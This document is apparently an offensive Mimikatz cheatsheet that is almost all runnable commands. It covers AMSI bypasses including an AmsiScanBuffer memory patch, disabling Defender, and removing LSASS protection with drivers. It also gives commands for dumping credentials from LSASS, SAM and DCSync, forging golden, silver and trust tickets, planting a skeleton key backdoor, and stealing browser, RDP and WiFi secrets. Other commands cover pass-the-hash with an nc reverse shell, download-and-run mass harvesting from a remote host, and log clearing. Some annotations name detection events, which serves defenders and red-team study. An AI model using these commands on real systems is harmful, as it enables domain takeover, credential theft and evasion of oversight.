Complete Mimikatz Exploitation Cheatsheet¶
Overview¶
Mimikatz Capabilities
Mimikatz is the Swiss Army knife for Windows credential exploitation, capable of:
- Memory Extraction: Dump plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS
- Credential Vault: Extract saved credentials from Windows Credential Manager
- Kerberos Attacks: Golden/Silver tickets, Pass-the-Ticket, OverPass-the-Hash
- Token Manipulation: Impersonate users through token manipulation
- Certificate Abuse: Extract certificates and keys from memory/stores
- DPAPI Decryption: Decrypt protected data including Chrome passwords, RDP credentials
- Driver Loading: Remove LSA Protection (RunAsPPL) from LSASS with its own signed kernel driver, mimidrv, and list the kernel callbacks EDR has registered
Initial Setup & Bypasses¶
Environment Preparation¶
PowerShell Setup
# Run as Administrator
Start-Process PowerShell_ISE -Verb RunAs
# Disable Defender real-time protection. Fails outright when Tamper Protection is on, and every change logs a Microsoft-Windows-Windows Defender/Operational 5001/5004 event, so this step is itself a detection
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionProcess "mimikatz.exe"
# Check Defender status
Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled
AMSI Bypass Required
# Method 1: Obfuscated AMSI bypass
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Method 2: Reflection-based bypass (the unobfuscated form: Defender's AMSI signatures match this exact line, so it only works once obfuscated as in Method 1)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 3: Memory patching. Overwrites the start of amsi!AmsiScanBuffer with "mov eax, 0x80070057 (E_INVALIDARG); ret" so every scan returns an error and the buffer is treated as clean. The byte pattern and the string "AmsiScanBuffer" are signatured; split the strings before use
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
# 0x40 = PAGE_EXECUTE_READWRITE; the size matches the 6-byte patch written below
[Win32]::VirtualProtect($Address, [uint32]6, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)   # mov eax, 0x80070057 ; ret
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
LSA Protection Bypass¶
Bypassing LSA Protection
# Check LSA Protection status
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
# 1 = PPL enabled (UEFI-locked only when deployed through the "with UEFI lock" policy), 2 = enabled without UEFI lock (Windows 11 22H2+), missing or 0 = not protected
# On a UEFI-locked machine deleting the value changes nothing until the UEFI variable is cleared
# Method 1: mimidrv driver. Needs SeLoadDriverPrivilege (local admin), logs a System 7045 "service was installed", and mimidrv.sys is on Microsoft's recommended driver block list, so HVCI / the vulnerable driver blocklist refuses to load it
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
# Method 2: PPLKiller (Mattiwatti), a kernel driver you load yourself; same driver-signing constraints as mimidrv
sc create PPLKiller binPath= C:\temp\PPLKiller.sys type= kernel start= demand
sc start PPLKiller
# Method 3: abuse a signed vulnerable driver (RTCore64.sys from MSI Afterburner). This is what RedCursor's PPLKiller.exe does from user mode; the driver is signed, so plain driver signature enforcement lets it load, only the blocklist/HVCI stops it
PPLKiller.exe /installDriver
PPLKiller.exe /disableLSAProtection
# Whichever route: re-protect with !processprotect /process:lsass.exe /add (or reboot) when done; an unprotected LSASS is exposed to everyone else on the host too
SEKURLSA Module - Memory Credentials¶
Core Credential Dumping¶
Primary Credential Extraction
# Standard logonpasswords dump: needs local admin (SeDebugPrivilege is granted to Administrators) and opens LSASS for reading, which Sysmon 10 / EDR LSASS-access rules record
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
# Full credential dump with all providers
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::credman" "sekurlsa::wdigest" "sekurlsa::kerberos" "sekurlsa::ssp" "sekurlsa::livessp" "sekurlsa::tspkg" "sekurlsa::cloudap"'
# Export to file
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords full" "exit"' | Out-File -FilePath C:\temp\creds.txt
# With Credential Guard on, the MSV/Kerberos secrets live in the isolated LSA and only encrypted blobs come back; with RunAsPPL on, acquireLSA fails until protection is removed (see LSA Protection Bypass)
Authentication Package Providers¶
All SEKURLSA Providers
# MSV1_0 (NTLM): NT hashes of every logon session, the default Windows authentication package
sekurlsa::msv
# WDigest: cleartext passwords. Caching is off by default since Windows 8.1 / 2012 R2 (KB2871997 for older); an attacker setting UseLogonCredential=1 is itself a common detection
sekurlsa::wdigest
# Kerberos: tickets and, for some sessions, the cleartext password
sekurlsa::kerberos
# TsPkg: Terminal Services (RDP SSO) credentials
sekurlsa::tspkg
# LiveSSP: Microsoft account (Live ID) credentials
sekurlsa::livessp
# SSP: credentials cached by custom Security Support Providers
sekurlsa::ssp
# CredMan: Credential Manager entries loaded in the session
sekurlsa::credman
# CloudAP: Azure AD / Entra ID joined devices (PRT and derived keys)
sekurlsa::cloudap
# DPAPI: master keys already decrypted in LSASS (and the credential cache)
sekurlsa::dpapi
# Ekeys: Kerberos encryption keys per session (aes256_hmac, aes128_hmac, rc4_hmac_nt); feed them to sekurlsa::pth /aes256:
sekurlsa::ekeys
# Trust: inter-domain trust keys (only meaningful on a DC)
sekurlsa::trust
# Backupkeys: DPAPI domain backup keys from memory (only on a DC)
sekurlsa::backupkeys
Process-Specific Credential Dumping¶
Targeted Process Extraction
# Work from a minidump instead of live LSASS: point sekurlsa at the dump before any other sekurlsa command
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
# Create the minidump with a signed Microsoft binary. It still opens LSASS with full access (Sysmon 10 / EDR LSASS-access rules fire); what you avoid is mimikatz.exe ever running on the host. Run it from an elevated PowerShell, which has SeDebugPrivilege enabled (an elevated cmd.exe usually fails)
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\Temp\lsass.dmp full
# Parse offline with a mimikatz build of the same architecture and at least as new as the dumped OS, otherwise acquireLSA fails on "Key import" / "Logon list"
sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords full
# Registry hives (no LSASS access at all; needs admin/SYSTEM): SAM + SYSTEM give local hashes, SECURITY + SYSTEM give LSA secrets and cached domain credentials
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
reg save HKLM\SECURITY security.hive
lsadump::sam /system:system.hive /sam:sam.hive
lsadump::secrets /system:system.hive /security:security.hive
lsadump::cache /system:system.hive /security:security.hive
Kerberos Module - Ticket Attacks¶
Pass-the-Ticket (PTT)¶
Kerberos Ticket Manipulation
# Export every ticket of every session from LSASS (needs privilege::debug); writes [id]-[user]@[service]-[target].kirbi files
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::tickets /export"'
# Tickets of your own session only (no privilege needed): list/export, or just the TGT
kerberos::list /export
kerberos::tgt
# List current tickets with the built-in
klist
# Inject a .kirbi (KRB-CRED) into the current session
Invoke-Mimikatz -Command '"kerberos::ptt c:\temp\ticket.kirbi"'
# Inject every .kirbi in a directory
kerberos::ptt c:\temp\tickets\
# mimikatz takes files only; injecting a base64 ticket is Rubeus syntax: Rubeus.exe ptt /ticket:<base64>
# Purge all tickets (including your own legitimate ones; the next Kerberos use triggers a fresh AS-REQ)
Invoke-Mimikatz -Command '"kerberos::purge"'
klist purge
Golden Ticket Attack¶
Domain Persistence via Golden Ticket
# Create Golden Ticket (requires the krbtgt key: NTLM hash or, better, the aes256_hmac key from lsadump::dcsync /user:krbtgt)
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /ptt"'
# Same with the AES256 key: the TGT is etype 0x12 like a real one. /krbtgt: produces an RC4 (0x17) ticket, which stands out in 4768/4769 on a domain where everything else is AES
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /aes256:AES256_KEY /user:Administrator /id:500 /ptt
# Golden Ticket with explicit groups (512 Domain Admins, 513 Domain Users, 518 Schema Admins, 519 Enterprise Admins, 520 Group Policy Creator Owners; these are also the defaults)
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /groups:512,513,518,519,520 /ptt
# Since the November 2021 Kerberos hardening (CVE-2021-42287, PAC_REQUESTOR) a patched DC rejects tickets for accounts that do not exist or whose RID does not match, so an invented "FakeAdmin /id:1337" fails with KDC_ERR_TGT_REVOKED: use a real account and its real RID
# Save golden ticket for later use
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /ticket:golden.kirbi
# Realistic lifetime (minutes). The default is 10 years, a classic golden-ticket indicator; match the domain's TGT policy (usually 600 = 10 h, renewable 7 days)
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /startoffset:-10 /endin:600 /renewmax:10080 /ptt
Silver Ticket Attack¶
Service-Specific Silver Tickets
# Create Silver Ticket for a specific service. /rc4 is the NTLM hash of the account running the service: the computer account (SERVER$) for host-based SPNs (cifs, host, http, rpcss, ldap), the SQL service account for MSSQLSvc. /target is the host name exactly as it appears in the SPN; /aes256: works too and blends in on AES-only hosts
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:cifs /rc4:HASH /user:Administrator /ptt
# The ticket never touches the KDC: no 4768/4769 on the DC, only a 4624 (type 3) on the target for a logon whose TGT never existed. SMB/LDAP signing do not stop it; PAC validation by the service (rare on domain members) does
# Common service types:
# CIFS - File access
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:cifs /rc4:HASH /user:admin /ptt
# HOST - scheduled tasks; WMI needs HOST + RPCSS, PSRemoting needs HOST + HTTP
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:HOST /rc4:HASH /user:admin /ptt
# LDAP - Directory queries on a DC (with the DC's machine hash this silver ticket also allows DCSync)
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:ldap /rc4:HASH /user:admin /ptt
# HTTP - Web services, WinRM/PSRemoting, PSWA
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:HTTP /rc4:HASH /user:admin /ptt
# MSSQL - Database access (the key is the SQL service account's, not the machine's)
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:sql.corp.local /service:MSSQLSvc /rc4:HASH /user:admin /ptt
Trust Ticket Attacks¶
Cross-Domain/Forest Exploitation
# Golden ticket with ExtraSids: the child domain's krbtgt plus the parent's Enterprise Admins SID (S-1-5-21-<parent>-519) in the PAC's SID history. Works inside a forest because SID filtering is not applied to parent/child trusts
Invoke-Mimikatz -Command '"kerberos::golden /domain:child.local /sid:S-1-5-21-XXX /sids:S-1-5-21-YYY-519 /krbtgt:HASH /user:Administrator /ticket:trust.kirbi"'
# Inject it
Invoke-Mimikatz -Command '"kerberos::ptt trust.kirbi"'
# Access parent domain resources (use the FQDN so Kerberos, not NTLM, is used)
dir \\dc01.parent.local\c$
# Same thing injected directly; this is the "ExtraSids" forest compromise from any child domain
kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-XXX /krbtgt:HASH /sids:S-1-5-21-PARENT-519 /ptt
# Across a forest trust the extra SIDs are stripped by SID filtering. A true inter-realm TGT forged with the trust key (see Multi-Forest Compromise below) only grants what the other forest has given your forest's principals
LSADUMP Module - System Secrets¶
SAM Database Dumping¶
Local Account Hash Extraction
# Online SAM dump: reads the SAM hive through the registry, so it needs SYSTEM (token::elevate), not just SeDebugPrivilege. LM fields are normally empty; the NTLM column is what sekurlsa::pth takes
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
# Offline SAM dump (hives from reg save or a volume shadow copy)
lsadump::sam /system:system.hive /sam:sam.hive
# With SYSKEY
lsadump::sam /system:system.hive /sam:sam.hive /syskey:0011223344556677889900AABBCCDDEE
# Patch the SAM service inside LSASS instead of reading the registry
lsadump::sam /patch
LSA Secrets Extraction¶
Service Account & Auto-logon Credentials
# Dump LSA secrets (needs SYSTEM): _SC_<service> = service account passwords, DefaultPassword = autologon, $MACHINE.ACC = computer account password, DPAPI_SYSTEM = the machine's DPAPI keys (needed for dpapi::wifi and other SYSTEM-protected blobs), NL$KM = key for cached domain credentials
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::secrets"'
# Offline LSA secrets
lsadump::secrets /system:system.hive /security:security.hive
# Cache dump (domain cached credentials, DCC2 / MS-Cache v2): crackable offline with hashcat -m 2100, but not usable for pass-the-hash
lsadump::cache
# Offline, from the hives (optionally with the boot key)
lsadump::cache /system:system.hive /security:security.hive /syskey:0011223344556677889900AABBCCDDEE
DCSync Attack¶
Domain Controller Replication
# Dump specific user. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain head; Domain Admins, Enterprise Admins and DCs have them by default, anyone else has been granted them explicitly
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
# Dump krbtgt (golden ticket material: take the aes256_hmac key as well as the NTLM hash)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'
# Dump all users. /csv prints one RID<TAB>user<TAB>NTLM<TAB>UAC line per account with no header (and the mimikatz banner on top), so save it as text and post-process; Export-Csv on the raw string would serialise the string object, not the rows
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /all /csv"' | Out-File -FilePath domain_hashes.txt
# Dump specific user by GUID
lsadump::dcsync /domain:corp.local /guid:{GUID}
# Dump with specific DC
lsadump::dcsync /domain:corp.local /dc:dc01.corp.local /user:Administrator
# Password history needs no flag: the per-user output already lists "ntlm- 0", "ntlm- 1", ... under Credentials
# Each call is a DRSUAPI DsGetNCChanges request: on the DC it shows as 4662 with the replication property GUIDs from a non-DC account, on the wire as MS-DRSR RPC from an IP that is not a DC
Domain Backup Keys¶
DPAPI Domain Backup Keys
# Extract the domain DPAPI backup key (needs Domain Admin). One RSA key per domain, created at domain setup and practically never rotated: it decrypts every domain user's master keys (not machine/SYSTEM ones), so it outlives every password change
lsadump::backupkeys /system:dc01.corp.local /export
# Produces ntds_capi_0_<GUID>.pvk (plus .der/.pfx); use the .pvk to decrypt any user master key offline
dpapi::masterkey /in:masterkey_file /pvk:ntds_capi_0_GUID.pvk
VAULT Module - Credential Manager¶
Windows Vault Enumeration¶
Stored Credentials Extraction
# List vaults (Web Credentials and Windows Credentials)
vault::list
# Dump Windows Credentials through CredEnumerate. /patch makes LSASS hand back the cleartext for entries it would otherwise return only as encrypted blobs; token::elevate is needed to see other users' vaults
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
# vault::cred has no per-type or per-GUID filter; the Type field of each entry tells generic from domain password/certificate credentials. For one credential file go through DPAPI instead (mimikatz does not expand %appdata%):
dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<file>
Credential Manager Manipulation¶
Credential Manager Attacks
# List stored credentials of the current user
cmdkey /list
# Add a credential for a target host; it is used automatically for SMB/RDP to that target (e.g. dir \\server01\c$)
cmdkey /add:server01 /user:corp\administrator /pass:Password123
# runas /savecred does not use the entry above: it looks for a "Domain:interactive=corp\administrator" entry, which it creates (and prompts for) on first use and reuses silently afterwards
runas /savecred /user:corp\administrator cmd.exe
# Delete specific credential
cmdkey /delete:server01
TOKEN Module - Token Manipulation¶
Token Impersonation¶
Token-Based Privilege Escalation
# Show the token mimikatz currently runs under
token::whoami
# List all tokens on the system (needs admin); the ID column is what /id: takes
token::list
# Only tokens belonging to a given user
token::list /user:Administrator
# Impersonate SYSTEM (the default)
token::elevate
# Impersonate a specific token by ID, or the first Domain Admin token found
token::elevate /id:TOKEN_ID
token::elevate /domainadmin
# Revert to the original token
token::revert
# Spawn a process under a chosen token instead of impersonating in-process
token::run /id:TOKEN_ID /process:cmd.exe
# There is no token::steal or token::duplicate: stealing a process token is token::list to find its ID, then token::elevate /id: or token::run /id:
Token Privileges¶
Privilege Management
# privilege::debug enables SeDebugPrivilege only; the privilege must already be assigned to the token (local admins have it)
privilege::debug
# Shortcuts for the other privileges mimikatz needs
privilege::driver      # SeLoadDriverPrivilege, needed before !+
privilege::backup      # SeBackupPrivilege
privilege::restore     # SeRestorePrivilege
privilege::tcb         # SeTcbPrivilege
privilege::security    # SeSecurityPrivilege
# Any privilege by name or LUID
privilege::name SeTakeOwnershipPrivilege
privilege::id 20
# mimikatz has no privilege::list or privilege::disable; check what the token holds with the built-in
whoami /priv
DPAPI Module - Protected Data¶
DPAPI Master Keys¶
Decrypting Protected Data
# Dump DPAPI master keys (and the credential cache) already decrypted in LSASS; the easiest route while you are on the box
sekurlsa::dpapi
# Decrypt a master key file (%appdata%\Microsoft\Protect\<SID>\<GUID>) with the user's password
dpapi::masterkey /in:masterkey_file /sid:S-1-5-21-XXX /password:Password123
# Decrypt with a hash: domain accounts derive the key from the NT hash, local accounts from SHA1 of the UTF-16LE password; mimikatz tells them apart by length
dpapi::masterkey /in:masterkey_file /sid:S-1-5-21-XXX /hash:HASH
# Use the domain backup key (from lsadump::backupkeys)
dpapi::masterkey /in:masterkey_file /pvk:domain_backup.pvk
# Ask the DC to decrypt it over MS-BKRP (works as the user who owns the key; no password needed)
dpapi::masterkey /in:masterkey_file /rpc
# Every master key decrypted in this session is cached and reused automatically by later dpapi:: commands
dpapi::cache
Chrome Password Extraction¶
Browser Credential Theft
# Dump Chrome passwords with a known master key (mimikatz does not expand %localappdata%, so give full paths)
dpapi::chrome /in:"C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:MASTERKEY
# In the victim's own session: /unprotect calls CryptUnprotectData as the logged-on user
dpapi::chrome /in:"C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data" /unprotect
# Chrome 80+ encrypts each entry with AES-256-GCM under a per-profile key that is itself DPAPI-wrapped in "Local State"; recent mimikatz builds unwrap it when given that file
dpapi::chrome /in:"C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /state:"C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Local State" /unprotect
# Chrome 127+ "app-bound encryption" wraps that key once more with the machine (SYSTEM) DPAPI key through the elevation service, so the user's master key alone no longer suffices
# Edge (Chromium) uses the same format: there is no dpapi::edge, point dpapi::chrome at the Edge profile
dpapi::chrome /in:"C:\Users\<user>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /unprotect
# Firefox does not use DPAPI (NSS: key4.db + logins.json) and there is no dpapi::firefox; use a tool such as firefox_decrypt against the profile folder
RDP Credentials¶
Remote Desktop Saved Credentials
# RDCMan: credential profiles in RDCMan.settings and per-server passwords in .rdg files are DPAPI blobs of the user who saved them
dpapi::rdg /in:"C:\Users\<user>\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" /unprotect
dpapi::rdg /in:C:\Users\<user>\connections.rdg /unprotect
# mstsc "remember me" credentials are Credential Manager entries (TERMSRV/<host>), one file per entry; mimikatz takes a single file, no wildcards or %appdata%
dir /a C:\Users\<user>\AppData\Roaming\Microsoft\Credentials
dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<file>
# Decrypt with a master key you already have (or run sekurlsa::dpapi first so dpapi::cache holds it)
dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<file> /masterkey:MASTERKEY
WiFi Passwords¶
Wireless Network Keys
# WLAN profile keys are DPAPI blobs protected with the machine (SYSTEM) key; the profile XMLs live under C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<GUID>\
# Get the SYSTEM DPAPI keys first (sekurlsa::dpapi while elevated to SYSTEM, or DPAPI_SYSTEM from lsadump::secrets), then decrypt a profile
dpapi::wifi /in:C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<GUID>\<GUID>.xml /unprotect
# Built-in alternative (needs admin): show one key in clear, or export every profile with keys
netsh wlan show profile name="Corporate WiFi" key=clear
netsh wlan export profile key=clear folder=C:\temp
CRYPTO Module - Certificates¶
Certificate Export¶
Certificate and Key Extraction
# List certificates (stores: My = personal, CA, Root, ...)
crypto::certificates /systemstore:local_machine
# Export certificates with private keys: writes .der and .pfx per certificate; the PFX password is always "mimikatz" (there is no option to change it)
crypto::certificates /systemstore:local_machine /export
# Current user certificates
crypto::certificates /systemstore:current_user /export
# Specific store
crypto::certificates /store:my /export
crypto::certificates /store:ca /export
crypto::certificates /store:root /export
# Keys marked non-exportable are skipped until the CAPI/CNG patches below are applied
Certificate Abuse¶
Certificate-Based Attacks
# Lift the "non-exportable" flag: crypto::capi patches CryptoAPI inside mimikatz's own process (legacy CSP keys); crypto::cng patches the KeyIso service inside LSASS (needs privilege::debug, blocked by RunAsPPL)
crypto::capi
crypto::cng
# Then export again
crypto::certificates /systemstore:local_machine /export
# Export bare key containers (CSP/KSP) rather than certificates
crypto::keys /export
crypto::keys /machine /export
# Why it matters: a machine certificate with the Client Authentication EKU authenticates as that machine via PKINIT (e.g. Rubeus asktgt /certificate:), a user certificate as that user, and a password change does not revoke either
# mimikatz has no /import or certificate-forging option: import a PFX with certutil -importpfx, forge with a stolen CA key using ForgeCert or Certipy
MISC Module - Additional Attacks¶
Skeleton Key Attack¶
Domain-Wide Backdoor
# Install skeleton key (password: mimikatz). Run on a DC with privilege::debug; it patches the Kerberos/NTLM validation code in the DC's LSASS, so RunAsPPL on the DC blocks it
privilege::debug
misc::skeleton
# Every domain account now also accepts "mimikatz" (real passwords keep working). In net use the password goes before /user:, and give the domain or you get a local logon attempt
net use \\dc01.corp.local\c$ mimikatz /user:corp\Administrator
# One skeleton key per DC, and only on that DC: other DCs are unaffected unless patched too
# Removal: none. It lives in LSASS memory and is gone when the DC reboots
Password Change¶
Direct Password Modification
# Change a password knowing the current hash (MS-SAMR change-password, the same path as a user-initiated change, so history and complexity rules apply)
lsadump::changentlm /server:dc01.corp.local /user:Administrator /old:OLD_HASH /new:NEW_HASH
# With cleartext
lsadump::changentlm /server:dc01.corp.local /user:Administrator /oldpassword:OldPass123 /newpassword:NewPass456
# Reset without the old value (needs reset-password rights on the target account); use it to put the original hash back after a temporary change
lsadump::setntlm /server:dc01.corp.local /user:Administrator /ntlm:ORIGINAL_HASH
Driver Manipulation¶
Kernel-Level Operations
# Load mimidrv as a service (needs SeLoadDriverPrivilege via privilege::driver; logs System 7045)
!+
# Unload it
!-
# Process protection removal (PPL level shown as xx/xx [signer-type-audit])
!processprotect /process:lsass.exe /remove
# Add process protection (also how you put LSASS back afterwards)
!processprotect /process:mimikatz.exe /add
# Kernel callbacks: what EDR/AV has registered for process, thread, image-load and registry events, plus file-system filters
!notifProcess
!notifThread
!notifImage
!notifReg
!filters
!minifilters
Pass-the-Hash Variants¶
Classic Pass-the-Hash¶
NTLM Authentication Without Password
# PTH: spawns cmd.exe in a new "netonly" logon session whose cached MSV/Kerberos material is replaced with the hash. Network authentication from that window uses the hash (NTLM directly, Kerberos through the RC4 key); your own session is untouched
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# PTH with PowerShell
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:powershell.exe
# PTH with specific program
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:"C:\tools\nc.exe -e cmd.exe 10.10.10.10 443"
# PTH with AES keys (Kerberos only, etype 0x12: no RC4 downgrade for the SOC to spot)
sekurlsa::pth /user:Administrator /domain:corp.local /aes256:AES_KEY /run:cmd.exe
# On the source host this is a 4624 with Logon Type 9, Logon Process "seclogo", Authentication Package Negotiate: the standard pth / runas /netonly indicator
OverPass-the-Hash¶
NTLM to Kerberos Ticket
# Over-pass-the-hash: the NT hash is the RC4-HMAC Kerberos key, so the KDC issues a TGT for it and no NTLM authentication ever crosses the wire
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# In the new window: a fresh logon session, so no tickets yet
klist
# Touch a resource by FQDN (a bare host name or IP may fall back to NTLM); this sends the AS-REQ and you get a TGT
dir \\dc01.corp.local\c$
klist
# The resulting 4768 shows etype 0x17 (RC4) for a user whose real logons use AES; use /aes256: to avoid that
Pass-the-Key¶
Kerberos Key Authentication
# Pass-the-key: sekurlsa::ekeys (or dcsync) gives the per-account Kerberos keys; the AES ones produce TGTs of the same etype as real logons
sekurlsa::pth /user:Administrator /domain:corp.local /aes256:KEY /run:cmd.exe
# PTK with AES128
sekurlsa::pth /user:Administrator /domain:corp.local /aes128:KEY /run:cmd.exe
# /rc4: is the NTLM hash under another name (the NT hash is the RC4-HMAC key)
sekurlsa::pth /user:Administrator /domain:corp.local /rc4:HASH /run:cmd.exe
# Protected Users members have no RC4 keys and cannot authenticate with NTLM, so for them only the AES variants work
Remote Mimikatz Execution¶
PowerShell Remoting¶
Remote Credential Dumping
# Basic remote execution: -ComputerName uses PowerShell Remoting (WinRM 5985/5986), needs admin on the target, runs inside wsmprovhost.exe there, and the whole script lands in the target's 4104 script block log
Invoke-Mimikatz -ComputerName DC01 -Command '"privilege::debug" "sekurlsa::logonpasswords"'
# Multiple computers
Invoke-Mimikatz -ComputerName DC01,SERVER01,WS01 -Command '"sekurlsa::logonpasswords"'
# With credentials
$cred = Get-Credential
Invoke-Mimikatz -ComputerName DC01 -Credential $cred -Command '"sekurlsa::logonpasswords"'
# Through WMI (process creation is logged as 4688 with the full command line, and the encoded command is trivially decoded)
Invoke-WmiMethod -ComputerName DC01 -Credential $cred -Class Win32_Process -Name Create -ArgumentList "powershell.exe -enc BASE64_MIMIKATZ_COMMAND"
Dump Credentials Remotely¶
Mass Credential Harvesting
# Disable real-time monitoring remotely (fails under Tamper Protection; logs Defender 5001 on the target)
Invoke-Command -ComputerName DC01 -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true}
# Deploy and execute without copying anything to the target: Invoke-Command reads the script on your machine and sends it over WinRM. Invoke-Mimikatz.ps1 only defines the function, so append the call before sending
$script = Get-Content C:\Tools\Invoke-Mimikatz.ps1 -Raw
$script += "`nInvoke-Mimikatz -Command '`"privilege::debug`" `"sekurlsa::logonpasswords`"'"
Invoke-Command -ComputerName DC01 -ScriptBlock ([scriptblock]::Create($script))
# One-liner remote dump: the target must reach your HTTP server, and the download plus IEX is an AMSI / 4104 hit
Invoke-Command -ComputerName DC01 -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'}
Defensive Evasion Techniques¶
Obfuscation Methods¶
AV/EDR Bypass Techniques
# Encoding or splitting the -Command string buys nothing: AMSI and script block logging see the Invoke-Mimikatz function body (the embedded mimikatz PE) when it is loaded, not the command you pass. Obfuscate the loader itself (Invoke-Obfuscation) or stay out of PowerShell
$command = '"privilege::debug" "sekurlsa::logonpasswords"'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Invoke-Mimikatz -Command ([System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded)))
# String concatenation: same caveat
Invoke-Mimikatz -Command ([string]::Join(' ', @('"privilege::debug"', '"sekurlsa::logonpasswords"')))
# Reflective PE injection (PowerSploit): mimikatz.exe never lands on disk, but its strings are in memory and EDR memory scanners look for them
$PEBytes = [IO.File]::ReadAllBytes("C:\temp\mimikatz.exe")
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "privilege::debug sekurlsa::logonpasswords exit"
# Memory-only execution: the download is logged (4104, AMSI) and the URL becomes an IOC
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1')
Timestomp & Cleanup¶
Post-Exploitation Cleanup
# Clearing logs does not hide you: each wevtutil cl writes Security 1102 / System 104 "the log was cleared" under your account, and forwarded or centralised copies are untouched
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
# Timestomp: this rewrites only the $STANDARD_INFORMATION timestamps; the $FILE_NAME attribute in the MFT and the USN journal keep the real ones
$(Get-Item C:\temp\mimikatz.exe).LastWriteTime = $(Get-Date "01/01/2019 12:00:00")
